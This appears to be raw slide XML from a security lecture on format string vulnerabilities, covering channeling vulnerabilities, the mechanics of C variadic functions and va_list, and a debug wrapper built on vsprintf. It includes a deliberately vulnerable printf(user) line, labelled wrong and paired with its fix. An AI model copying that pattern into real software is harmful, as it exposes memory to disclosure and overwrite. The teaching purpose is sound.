              <a:gd name="connsiteX19" fmla="*/ 582706 w 1367174"/>
              <a:gd name="connsiteY19" fmla="*/ 1301485 h 1301485"/>
              <a:gd name="connsiteX20" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY20" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX21" fmla="*/ 1180353 w 1367174"/>
              <a:gd name="connsiteY21" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX22" fmla="*/ 1210235 w 1367174"/>
              <a:gd name="connsiteY22" fmla="*/ 1211838 h 1301485"/>
              <a:gd name="connsiteX23" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY23" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX24" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY24" fmla="*/ 1137132 h 1301485"/>
              <a:gd name="connsiteX25" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY25" fmla="*/ 1032544 h 1301485"/>
              <a:gd name="connsiteX26" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY26" fmla="*/ 434897 h 1301485"/>
              <a:gd name="connsiteX27" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY27" fmla="*/ 375132 h 1301485"/>
              <a:gd name="connsiteX28" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY28" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX29" fmla="*/ 1165412 w 1367174"/>
              <a:gd name="connsiteY29" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX30" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY30" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX31" fmla="*/ 1001059 w 1367174"/>
              <a:gd name="connsiteY31" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX32" fmla="*/ 956235 w 1367174"/>
              <a:gd name="connsiteY32" fmla="*/ 76309 h 1301485"/>
              <a:gd name="connsiteX33" fmla="*/ 851647 w 1367174"/>
              <a:gd name="connsiteY33" fmla="*/ 46427 h 1301485"/>
              <a:gd name="connsiteX34" fmla="*/ 806824 w 1367174"/>
              <a:gd name="connsiteY34" fmla="*/ 31485 h 1301485"/>
              <a:gd name="connsiteX35" fmla="*/ 732118 w 1367174"/>
              <a:gd name="connsiteY35" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX36" fmla="*/ 687294 w 1367174"/>
              <a:gd name="connsiteY36" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX37" fmla="*/ 567765 w 1367174"/>
              <a:gd name="connsiteY37" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX0" fmla="*/ 508000 w 1367174"/>
              <a:gd name="connsiteY0" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX1" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY1" fmla="*/ 91250 h 1301485"/>
              <a:gd name="connsiteX2" fmla="*/ 283883 w 1367174"/>
              <a:gd name="connsiteY2" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX3" fmla="*/ 239059 w 1367174"/>
              <a:gd name="connsiteY3" fmla="*/ 121132 h 1301485"/>
              <a:gd name="connsiteX4" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY4" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX5" fmla="*/ 89647 w 1367174"/>
              <a:gd name="connsiteY5" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX6" fmla="*/ 74706 w 1367174"/>
              <a:gd name="connsiteY6" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX7" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY7" fmla="*/ 315368 h 1301485"/>
              <a:gd name="connsiteX8" fmla="*/ 29883 w 1367174"/>
              <a:gd name="connsiteY8" fmla="*/ 405015 h 1301485"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1367174"/>
              <a:gd name="connsiteY9" fmla="*/ 494662 h 1301485"/>
              <a:gd name="connsiteX10" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY10" fmla="*/ 927956 h 1301485"/>
              <a:gd name="connsiteX11" fmla="*/ 59765 w 1367174"/>
              <a:gd name="connsiteY11" fmla="*/ 972780 h 1301485"/>
              <a:gd name="connsiteX12" fmla="*/ 119530 w 1367174"/>
              <a:gd name="connsiteY12" fmla="*/ 1047485 h 1301485"/>
              <a:gd name="connsiteX13" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY13" fmla="*/ 1107250 h 1301485"/>
              <a:gd name="connsiteX14" fmla="*/ 194235 w 1367174"/>
              <a:gd name="connsiteY14" fmla="*/ 1152074 h 1301485"/>
              <a:gd name="connsiteX15" fmla="*/ 298824 w 1367174"/>
              <a:gd name="connsiteY15" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX16" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY16" fmla="*/ 1226780 h 1301485"/>
              <a:gd name="connsiteX17" fmla="*/ 403412 w 1367174"/>
              <a:gd name="connsiteY17" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX18" fmla="*/ 493059 w 1367174"/>
              <a:gd name="connsiteY18" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX19" fmla="*/ 582706 w 1367174"/>
              <a:gd name="connsiteY19" fmla="*/ 1301485 h 1301485"/>
              <a:gd name="connsiteX20" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY20" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX21" fmla="*/ 1180353 w 1367174"/>
              <a:gd name="connsiteY21" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX22" fmla="*/ 1210235 w 1367174"/>
              <a:gd name="connsiteY22" fmla="*/ 1211838 h 1301485"/>
              <a:gd name="connsiteX23" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY23" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX24" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY24" fmla="*/ 1137132 h 1301485"/>
              <a:gd name="connsiteX25" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY25" fmla="*/ 1032544 h 1301485"/>
              <a:gd name="connsiteX26" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY26" fmla="*/ 434897 h 1301485"/>
              <a:gd name="connsiteX27" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY27" fmla="*/ 375132 h 1301485"/>
              <a:gd name="connsiteX28" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY28" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX29" fmla="*/ 1165412 w 1367174"/>
              <a:gd name="connsiteY29" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX30" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY30" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX31" fmla="*/ 1001059 w 1367174"/>
              <a:gd name="connsiteY31" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX32" fmla="*/ 851647 w 1367174"/>
              <a:gd name="connsiteY32" fmla="*/ 46427 h 1301485"/>
              <a:gd name="connsiteX33" fmla="*/ 806824 w 1367174"/>
              <a:gd name="connsiteY33" fmla="*/ 31485 h 1301485"/>
              <a:gd name="connsiteX34" fmla="*/ 732118 w 1367174"/>
              <a:gd name="connsiteY34" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX35" fmla="*/ 687294 w 1367174"/>
              <a:gd name="connsiteY35" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX36" fmla="*/ 567765 w 1367174"/>
              <a:gd name="connsiteY36" fmla="*/ 1603 h 13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67174" h="1301485">
                <a:moveTo>
                  <a:pt x="508000" y="16544"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="447040" y="47024"/>
                  <a:pt x="407086" y="70104"/>
                  <a:pt x="343647" y="91250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="324166" y="97744"/>
                  <a:pt x="303627" y="100550"/>
                  <a:pt x="283883" y="106191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268739" y="110518"/>
                  <a:pt x="254000" y="116152"/>
                  <a:pt x="239059" y="121132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="219137" y="136073"/>
                  <a:pt x="199695" y="151676"/>
                  <a:pt x="179294" y="165956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149872" y="186551"/>
                  <a:pt x="89647" y="225721"/>
                  <a:pt x="89647" y="225721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84667" y="245642"/>
                  <a:pt x="83889" y="267118"/>
                  <a:pt x="74706" y="285485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68406" y="298085"/>
                  <a:pt x="49770" y="302178"/>
                  <a:pt x="44824" y="315368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34187" y="343734"/>
                  <a:pt x="37231" y="375625"/>
                  <a:pt x="29883" y="405015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22243" y="435573"/>
                  <a:pt x="9961" y="464780"/>
                  <a:pt x="0" y="494662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16234" y="697579"/>
                  <a:pt x="2102" y="778427"/>
                  <a:pt x="44824" y="927956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49151" y="943100"/>
                  <a:pt x="52722" y="958693"/>
                  <a:pt x="59765" y="972780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78613" y="1010477"/>
                  <a:pt x="91735" y="1019691"/>
                  <a:pt x="119530" y="1047485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159373" y="1167017"/>
                  <a:pt x="99608" y="1027563"/>
                  <a:pt x="179294" y="1107250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="190430" y="1118387"/>
                  <a:pt x="183098" y="1140937"/>
                  <a:pt x="194235" y="1152074"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212698" y="1170537"/>
                  <a:pt x="272036" y="1187968"/>
                  <a:pt x="298824" y="1196897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="313765" y="1206858"/>
                  <a:pt x="327142" y="1219706"/>
                  <a:pt x="343647" y="1226780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="362521" y="1234869"/>
                  <a:pt x="383743" y="1235820"/>
                  <a:pt x="403412" y="1241721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="433582" y="1250772"/>
                  <a:pt x="463177" y="1261642"/>
                  <a:pt x="493059" y="1271603"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="582706" y="1301485"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="752039" y="1291524"/>
                  <a:pt x="921922" y="1288481"/>
                  <a:pt x="1090706" y="1271603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1122048" y="1268469"/>
                  <a:pt x="1180353" y="1241721"/>
                  <a:pt x="1180353" y="1241721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1190314" y="1231760"/>
                  <a:pt x="1198156" y="1219086"/>
                  <a:pt x="1210235" y="1211838"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1223740" y="1203735"/>
                  <a:pt x="1242960" y="1206980"/>
                  <a:pt x="1255059" y="1196897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1274189" y="1180955"/>
                  <a:pt x="1286685" y="1158249"/>
                  <a:pt x="1299883" y="1137132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1326259" y="1094931"/>
                  <a:pt x="1330182" y="1076117"/>
                  <a:pt x="1344706" y="1032544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1368060" y="799004"/>
                  <a:pt x="1380616" y="740137"/>
                  <a:pt x="1344706" y="434897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1341796" y="410166"/>
                  <a:pt x="1314824" y="395054"/>
                  <a:pt x="1299883" y="375132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1289225" y="343161"/>
                  <a:pt x="1282317" y="309336"/>
                  <a:pt x="1255059" y="285485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1228031" y="261835"/>
                  <a:pt x="1165412" y="225721"/>
                  <a:pt x="1165412" y="225721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1110199" y="142899"/>
                  <a:pt x="1167121" y="208409"/>
                  <a:pt x="1090706" y="165956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1059311" y="148515"/>
                  <a:pt x="1040902" y="126113"/>
                  <a:pt x="1001059" y="106191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="961216" y="86270"/>
                  <a:pt x="884019" y="58878"/>
                  <a:pt x="851647" y="46427"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="819275" y="33976"/>
                  <a:pt x="822103" y="35305"/>
                  <a:pt x="806824" y="31485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="782187" y="25326"/>
                  <a:pt x="756755" y="22703"/>
                  <a:pt x="732118" y="16544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="716839" y="12724"/>
                  <a:pt x="702979" y="3029"/>
                  <a:pt x="687294" y="1603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="647615" y="-2004"/>
                  <a:pt x="607608" y="1603"/>
                  <a:pt x="567765" y="1603"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln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86560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Channeling Vulnerabilities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1007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... arise when control and data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>are mixed into one channel. </a:t>
            </a:r>
          </a:p>
          <a:p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76202"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="558624" y="3161490"/>
          <a:ext cx="8026752" cy="2667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  <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t>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Disclose</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> or write to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malloc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> buffers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malloc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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 metadata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hijack/write to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hijack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Phreaking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Voice or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Operator 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Seize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> line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0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/>
              </a:rPr>
              <a:t>Don’t abuse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf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Wrong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981201"/>
            <a:ext cx="4040188" cy="17912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wrong(char *user)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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(user);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17912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ok(char *user)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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“%s”, user);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  <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Folded Corner 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="4114800"/>
            <a:ext cx="3962400" cy="1726347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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Alternatives: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fputs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(user,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stdout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puts(user) //newline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How format strings, and more generally variadic functions, are implemented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How to exploit format string vulnerabilities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5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Functions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19753"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="3500120"/>
          <a:ext cx="822960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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>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to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>stdout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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>fprintf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to a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>FILE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>sprintf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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> to a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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>vfprintf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to a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>FILE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> stream from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>va_list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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>syslog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writes a message to the system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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>setproctitle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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/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72571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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, ...)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682924" y="2556760"/>
            <a:ext cx="2355676" cy="659260"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50135"/>
              <a:gd name="adj2" fmla="val -10220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Specifies number and types of arguments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340524" y="2556760"/>
            <a:ext cx="2355676" cy="659260"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65928"/>
              <a:gd name="adj2" fmla="val -10474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7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… are functions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>indefinite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>arity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Widely supported in languages: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Perl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4724400" y="4114800"/>
            <a:ext cx="3962400" cy="1634520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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, caller is responsible to clean up the arguments.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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Can you guess 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2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non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>variadic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> functions, the compiler:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>knows number and types of arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>emits instructions for caller to push arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>right to left</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>emits instructions for callee to access arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via frame pointer (or stack pointer [advanced])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For variadic functions, the compiler emits instructions for the program to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>walk the stack at runtime for arguments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 we want to implement a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>-like function that only prints when a debug key is set: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8229600" cy="281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void debug(char *key, char *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...) {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va_list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ap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char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[BUFSIZE];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if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>KeyInList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(key)) return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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va_start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ap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vsprintf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ap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va_end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ap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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“%s”,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34318" y="3623803"/>
            <a:ext cx="3371482" cy="698040"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -107650"/>
              <a:gd name="adj2" fmla="val 774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up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to point to stack using last fixed argument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733800" y="5248873"/>
            <a:ext cx="1812805" cy="361216"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -137184"/>
              <a:gd name="adj2" fmla="val -12057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Cleanup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69403" y="4622388"/>
            <a:ext cx="3283890" cy="339326"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99351"/>
              <a:gd name="adj2" fmla="val -611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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with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46</a:t>
            </a:fld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943600" y="3048000"/>
            <a:ext cx="2780696" cy="393240"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -177073"/>
              <a:gd name="adj2" fmla="val 919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pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap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19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Diagram for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429000" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Think of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> as</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>a pointer to the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>second argument</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(first after format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Each format specifier indicates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> of current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Know how far to increment pointer for next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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3352800" y="3657600"/>
            <a:ext cx="1417597" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -123682"/>
              <a:gd name="adj2" fmla="val -14958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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>specifier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3352800" y="2620428"/>
            <a:ext cx="1828800" cy="884772"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105504"/>
              <a:gd name="adj2" fmla="val -4335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specified argument (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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3352799" y="1676400"/>
            <a:ext cx="1417597" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -119382"/>
              <a:gd name="adj2" fmla="val -2508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n-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> specified argument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8895"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="1461558" cy="4859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callee-save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3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47935" y="4347939"/>
